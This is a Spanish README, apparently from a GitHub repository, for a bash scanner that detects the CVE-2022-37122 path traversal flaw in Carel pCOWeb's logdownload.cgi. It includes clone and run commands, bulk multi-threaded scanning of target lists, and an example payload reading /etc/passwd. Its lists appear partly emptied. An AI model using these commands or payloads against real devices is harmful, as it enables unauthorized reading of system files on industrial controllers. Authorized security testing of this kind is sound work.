
CVE-2022-37122 Escáner de Path Traversal
Un escáner robusto y repleto de funciones para detectar la vulnerabilidad de path traversal en logdownload.cgi de Carel pCOWeb (CVE-2022-37122). Diseñado para investigadores de seguridad y evaluadores de penetración autorizados.
SOLO PARA USO EDUCATIVO / BUG BOUNTY
Esta herramienta está destinada a:
NO utilice esta herramienta contra sistemas que no posea o para los que no tenga permiso explícito por escrito para probar.
/etc/hostname (archivo no sensible) para pruebas responsablesbash (v4.0+)curlfiglet (para el banner - se instala automáticamente)git clone https://github.com/bughuntar/cve-2022-37122-scanner.git
cd cve-2022-37122-scanner
chmod +x cve-2022-37122-scanner.sh
./cve-2022-37122-scanner.sh -u http://target-ip
./cve-2022-37122-scanner.sh -f targets.txt -t 16 -o results.csv
./cve-2022-37122-scanner.sh \
-u https://device.local \
-p '../../../../../../../../etc/passwd' \
--insecure \
-v \
-t 20 \
-o detailed_findings.csv
El escáner genera un archivo CSV con las siguientes columnas:
host: URL del host objetivourl: URL completa de explotaciónstatus: Estado de la vulnerabilidad (VULNERABLE, POSSIBLE, NOT_DETECTED, ERROR)matched_pattern: Patrón de detección coincidentesample_file: Ruta a la muestra de respuestaLas muestras de respuesta se guardan en el directorio especificado para verificación manual y recopilación de evidencia.
El escáner utiliza múltiples métodos de detección:
El escáner por defecto lee /etc/hostname, el cual:
Si usa payloads personalizados, asegúrese de:
Esta herramienta demuestra:
Professor the Hunter
¡Las contribuciones son bienvenidas! Por favor:
Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas. El autor no es responsable de ningún uso indebido o daño causado por este programa. Obtenga siempre la autorización adecuada antes de realizar pruebas de seguridad.
| Opción | Descripción | Por defecto |
|---|
-u, --url URL | URL del objetivo individual | - |
-f, --file FILE | Archivo que contiene URLs objetivo | - |
-o, --output FILE | Archivo CSV de salida | findings.csv |
-s, --samples-dir DIR | Directorio para muestras de respuesta | samples |
-t, --threads N | Número de hilos concurrentes | 8 |
-p, --payload STR | Payload de path traversal | /etc/hostname |
--insecure | Ignorar errores de certificado SSL | - |
-v, --verbose | Salida verbose | - |
-h, --help | Mostrar mensaje de ayuda | - |